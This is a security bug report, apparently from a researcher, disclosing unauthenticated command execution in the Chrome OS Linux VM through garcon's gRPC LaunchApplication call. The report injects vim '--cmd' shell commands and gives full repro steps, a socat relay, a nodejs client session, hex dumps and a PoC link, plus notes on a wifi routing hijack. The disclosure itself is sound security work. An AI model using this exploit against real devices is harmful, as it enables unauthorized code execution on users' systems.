======================= BUG DESCRIPTION =======================
There is a variety of RPC communication channels between the Chrome OS host
system and the crosvm guest. This bug report focuses on communication on TCP
port 8889, which is used by the "garcon" service.
Among other things, garcon is responsible for:
- sending URLs to be opened from the guest to the host
- telling the host which applications (more precisely, .desktop files) are
installed in the guest, so that the host can display them in the launcher
- telling the guest to launch applications when the user clicks on stuff in the
launcher
garcon uses gRPC, which is an RPC protocol that sends protobufs over plaintext
HTTP/2. (Other system components communicate with the VM over gRPC-over-vsock,
but garcon uses gRPC-over-TCP.) For some command types, the TCP connection is
initiated by the host; for others, it is initiated by the guest. Both guest and
host are listening on [::]:8889; however, the iptables rules of the host prevent
an outside host from simply connecting to those sockets.
However, Chrome OS apps running on the host (and I think also Android apps, but
I haven't tested that) are not affected by such restrictions. This means that a
Chrome OS app with the "Exchange data with any device on the local network or
internet" permission can open a gRPC socket to the guest's garcon (no
authentication required) and send a vm_tools.container.Garcon.LaunchApplication
RPC call to the guest. This RPC call takes two arguments:
// Request protobuf for launching an application in the container.
message LaunchApplicationRequest {
// The ID of the application to launch. This should correspond to an
// identifier for a .desktop file available in the container.
string desktop_file_id = 1;
// Files to pass as arguments when launching the application, if any, given
// as absolute paths within the container's filesystem.
repeated string files = 2;
}
"desktop_file_id" is actually a relative path to a .desktop file without the
".desktop". One preinstalled .desktop file in the VM is for the VIM editor.
"files" is an array of "paths" that should be provided to the application as
arguments - but actually, you can just pass in arbitrary arguments this way.
This only works for applications whose .desktop files permit passing arguments,
but vim.desktop does permit that.
VIM permits passing a VIM command to be executed on startup using the "--cmd"
flag, and a VIM command that starts with an exclamation mark is interpreted as
a shell command.
So in summary, you can execute arbitrary shell commands by sending a gRPC like
this to the VM:
vm_tools.container.Garcon.LaunchApplication({
desktop_file_id: 'vim',
files: [
'--cmd',
'!id>/tmp/owned'
]
})
For my PoC, since I didn't want to try directly speaking gRPC from inside a
Chrome app, I instead built an app that forwards the garcon port to the outside
network, and then connected to garcon from a normal Linux workstation.
Repro instructions are at the bottom of this bug report, under
"REPRO INSTRUCTIONS", but first I'll list a few other things about crosvm that
look interesting from a security perspective.
Because of this issue, and because of the routing issue described below, I
strongly recommend getting rid of TCP-based communication with the VM entirely.
The various other inter-VM socket types that are already used should be more
than sufficient.
======================= RANDOM OBSERVATIONS =======================
This section lists a bunch of things that I haven't written full PoCs for so far,
but that look interesting or bad from a security perspective:
------------------- ROUTING TABLE -------------------
It is possible for a malicious wifi router to get packets from the host-side
garcon RPC endpoint. You might be able to do bad stuff to a Chrome OS
device over the network using this, but I haven't fully tested this yet.
Normally, when you connect the Chrome OS device to a wifi network, the routing
table looks as follows:
localhost / # route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.246.1 0.0.0.0 UG 1 0 0 wlan0
100.115.92.0 0.0.0.0 255.255.255.252 U 0 0 0 arcbr0
100.115.92.4 0.0.0.0 255.255.255.252 U 0 0 0 vmtap0
100.115.92.192 100.115.92.6 255.255.255.240 UG 0 0 0 vmtap0
192.168.246.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
Routing precedence depends on prefix length; more specific routes take
precedence over the default route. The 100.115.92.192/28 route is the most
specific one for traffic to the VM at 100.115.92.204, so that is the route used
for RPC calls to that IP address.
However, the wifi router can supply routing information that influences the
routing table. By modifying the wifi router's settings and reconnecting the
Chrome OS device, I get the following routing table in Chrome OS:
localhost / # route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 100.115.92.201 0.0.0.0 UG 1 0 0 wlan0
8.8.8.8 100.115.92.201 255.255.255.255 UGH 0 0 0 wlan0
100.115.92.0 0.0.0.0 255.255.255.252 U 0 0 0 arcbr0
100.115.92.4 0.0.0.0 255.255.255.252 U 0 0 0 vmtap0
100.115.92.192 100.115.92.6 255.255.255.240 UG 0 0 0 vmtap0
100.115.92.200 0.0.0.0 255.255.255.248 U 0 0 0 wlan0
Now the 100.115.92.200/29 route pointing to wlan0 takes precedence over the
legitimate 100.115.92.192/28 route. I then told my router to respond to ARP
queries for 100.115.92.204 (the VM's IP) and ran wireshark on the wifi router
while connecting the ChromeOS device to it. I observed a TCP ACK packet coming
in on port 8889, from 100.115.92.5, with the following payload:
00000000 00 00 19 01 04 00 00 00 09 c7 c6 be c4 c3 c2 c1 ........ ........
00000010 c0 00 0c 67 72 70 63 2d 74 69 6d 65 6f 75 74 02 ...grpc- timeout.
00000020 32 53 00 00 2S..
I also got a TCP SYN packet on port 2222 (that's the port on which OpenSSH
listens in the VM).
------------------- SSHFS -------------------
When the user wishes to access the guest's filesystem from the host, sshfs is
used - a FUSE filesystem that uses ssh to interact with sftp-server on the
remote side.
sshfs runs with CAP_SYS_CHOWN, CAP_SETGID, CAP_SETUID and CAP_SYS_ADMIN, and
those privileges are even inherited by the ssh process.
------------------- VIRTIO WAYLAND -------------------
The crosvm host process implements a virtio protocol for Wayland. This is
described as follows in the guest kernel driver:
* Virtio Wayland (virtio_wl or virtwl) is a virtual device that allows a guest
* virtual machine to use a wayland server on the host transparently (to the
* host). This is done by proxying the wayland protocol socket stream verbatim
* between the host and guest over 2 (recv and send) virtio queues. The guest
* can request new wayland server connections to give each guest wayland client
* a different server context. Each host connection's file descriptor is exposed
* to the guest as a virtual file descriptor (VFD). Additionally, the guest can
* request shared memory file descriptors which are also exposed as VFDs. These
* shared memory VFDs are directly writable by the guest via device memory
* injected by the host. Each VFD is sendable along a connection context VFD and
* will appear as ancillary data to the wayland server, just like a message from
* an ordinary wayland client. When the wayland server sends a shared memory
* file descriptor to the client (such as when sending a keymap), a VFD is
* allocated by the device automatically and its memory is injected into as
* device memory.
Note the "verbatim" - as far as I can tell, the host component is not filtering
anything, but just plumbs the wayland traffic straight into the
/run/chrome/wayland-0 socket, on which the chrome browser process is listening.
If I read the code correctly, the low-level parsing of wayland RPCs is then
performed using the C code in libwayland, while the high-level handling of a
bunch of RPCs is done in C++ code in Chrome in src/components/exo/wayland/.
======================= REPRO INSTRUCTIONS =======================
Tested on: "10820.0.0 (Official Build) dev-channel eve"
Switch your Chrome OS victim machine to the dev channel so that the Linux VM
feature becomes available.
Set up a wifi network on which direct connections between machines are permitted,
and connect the victim device to it.
Open the Chrome OS settings. Enable "Linux (Beta)", wait for the install process
to complete, then launch crosvm by clicking the Terminal icon in the launcher.
In the guest OS terminal, determine the container's IP address with "ip addr".
For me, the address is 100.115.92.204, but it seems to change when you
reinstall the container.
On the attacker machine, run
"socat -d TCP-LISTEN:1335,reuseaddr TCP-LISTEN:1336,reuseaddr".
This is just a TCP server that copies data between a client on TCP port 1335
(must connect first) and a client on TCP port 1336.
On the host, unzip garcon_forwarder.zip and load it as unpacked app. Then
open "garcon forwarder" from the launcher, fill in the correct IP addresses, and
press "run". You should see a little bit of hexdump appearing in the app.
On the attacker machine, install nodejs, then, in a folder containing
container_guest.proto:
$ npm install grpc
[...]
$ npm install @grpc/proto-loader
[...]
$ node
> var grpc = require('grpc');
undefined
> var protoLoader = require('@grpc/proto-loader');
undefined
> var packageDefinition = protoLoader.loadSync('./container_guest.proto', {keepCase: true, longs: String, enums: String, defaults: true, oneofs: true});
undefined
> var protoDescriptor = grpc.loadPackageDefinition(packageDefinition);
undefined
> var stub = new protoDescriptor.vm_tools.container.Garcon('localhost:1336', grpc.credentials.createInsecure());
undefined
> stub.launchApplication({desktop_file_id:'vim',files:['--cmd','!id>/tmp/owned']}, function() {console.log(arguments)});
ClientUnaryCall {
domain:
Domain {
domain: null,
_events:
{ removeListener: [Function: updateExceptionCapture],
newListener: [Function: updateExceptionCapture],
error: [Function: debugDomainError] },
_eventsCount: 3,
_maxListeners: undefined,
members: [] },
_events: {},
_eventsCount: 0,
_maxListeners: undefined,
call:
InterceptingCall {
next_call: InterceptingCall { next_call: null, requester: [Object] },
requester: undefined } }
> [Arguments] { '0': null, '1': { success: true, failure_reason: '' } }
At this point, in the garcon forwarder app, you should see this:
activating...
connected to garcon over socket 16
connected to attacker over socket 17
on socket 16, received:
00 00 12 04 00 00 00 00 00 00 04 00 00 ff ff 00 |................|
06 00 00 40 00 fe 03 00 00 00 01 00 00 04 08 00 |...@............|
00 00 00 00 7f ff 00 00 |........|
on socket 17, received:
50 52 49 20 2a 20 48 54 54 50 2f 32 2e 30 0d 0a |PRI * HTTP/2.0..|
0d 0a 53 4d 0d 0a 0d 0a 00 00 24 04 00 00 00 00 |..SM......$.....|
00 00 02 00 00 00 00 00 03 00 00 00 00 00 04 00 |................|
40 00 00 00 05 00 40 00 00 00 06 00 00 20 00 fe |@.....@...... ..|
03 00 00 00 01 00 00 04 08 00 00 00 00 00 00 3f |...............?|
00 01 00 00 08 06 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 |...|
on socket 17, received:
00 01 2b 01 04 00 00 00 01 40 07 3a 73 63 68 65 |..+......@.:sche|
6d 65 04 68 74 74 70 40 07 3a 6d 65 74 68 6f 64 |me.http@.:method|
04 50 4f 53 54 40 0a 3a 61 75 74 68 6f 72 69 74 |.POST@.:authorit|
79 0e 6c 6f 63 61 6c 68 6f 73 74 3a 31 33 33 36 |y.localhost:1336|
40 05 3a 70 61 74 68 2c 2f 76 6d 5f 74 6f 6f 6c |@.:path,/vm_tool|
73 2e 63 6f 6e 74 61 69 6e 65 72 2e 47 61 72 63 |s.container.Garc|
6f 6e 2f 4c 61 75 6e 63 68 41 70 70 6c 69 63 61 |on/LaunchApplica|
74 69 6f 6e 40 02 74 65 08 74 72 61 69 6c 65 72 |tion@.te.trailer|
73 40 0c 63 6f 6e 74 65 6e 74 2d 74 79 70 65 10 |s@.content-type.|
61 70 70 6c 69 63 61 74 69 6f 6e 2f 67 72 70 63 |application/grpc|
40 0a 75 73 65 72 2d 61 67 65 6e 74 3c 67 72 70 |@.user-agent<grp|
63 2d 6e 6f 64 65 2f 31 2e 31 33 2e 30 20 67 72 |c-node/1.13.0 gr|
70 63 2d 63 2f 36 2e 30 2e 30 2d 70 72 65 31 20 |pc-c/6.0.0-pre1 |
28 6c 69 6e 75 78 3b 20 63 68 74 74 70 32 3b 20 |(linux; chttp2; |
67 6c 6f 72 69 6f 73 61 29 40 14 67 72 70 63 2d |gloriosa)@.grpc-|
61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 15 |accept-encoding.|
69 64 65 6e 74 69 74 79 2c 64 65 66 6c 61 74 65 |identity,deflate|
2c 67 7a 69 70 40 0f 61 63 63 65 70 74 2d 65 6e |,gzip@.accept-en|
63 6f 64 69 6e 67 0d 69 64 65 6e 74 69 74 79 2c |coding.identity,|
67 7a 69 70 00 00 04 08 00 00 00 00 01 00 00 00 |gzip............|
05 00 00 21 00 01 00 00 00 01 00 00 00 00 1c 0a |...!............|
03 76 69 6d 12 05 2d 2d 63 6d 64 12 0e 21 69 64 |.vim..--cmd..!id|
3e 2f 74 6d 70 2f 6f 77 6e 65 64 00 00 04 08 00 |>/tmp/owned.....|
00 00 00 00 00 00 00 05 |........|
on socket 16, received:
00 00 00 04 01 00 00 00 00 00 00 08 06 01 00 00 |................|
00 00 00 00 00 00 00 00 00 00 |..........|
on socket 16, received:
00 00 58 01 04 00 00 00 01 40 07 3a 73 74 61 74 |..X......@.:stat|
75 73 03 32 30 30 40 0c 63 6f 6e 74 65 6e 74 2d |us.200@.content-|
74 79 70 65 10 61 70 70 6c 69 63 61 74 69 6f 6e |type.application|
2f 67 72 70 63 40 14 67 72 70 63 2d 61 63 63 65 |/grpc@.grpc-acce|
70 74 2d 65 6e 63 6f 64 69 6e 67 15 69 64 65 6e |pt-encoding.iden|
74 69 74 79 2c 64 65 66 6c 61 74 65 2c 67 7a 69 |tity,deflate,gzi|
70 00 00 07 00 00 00 00 00 01 00 00 00 00 02 08 |p...............|
01 00 00 0f 01 05 00 00 00 01 40 0b 67 72 70 63 |..........@.grpc|
2d 73 74 61 74 75 73 01 30 |-status.0|
Now, in the Linux VM, you can see the created file:
gjannhtest1@penguin:~$ cat /tmp/owned
uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),44(video),46(plugdev),100(users)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45407.zip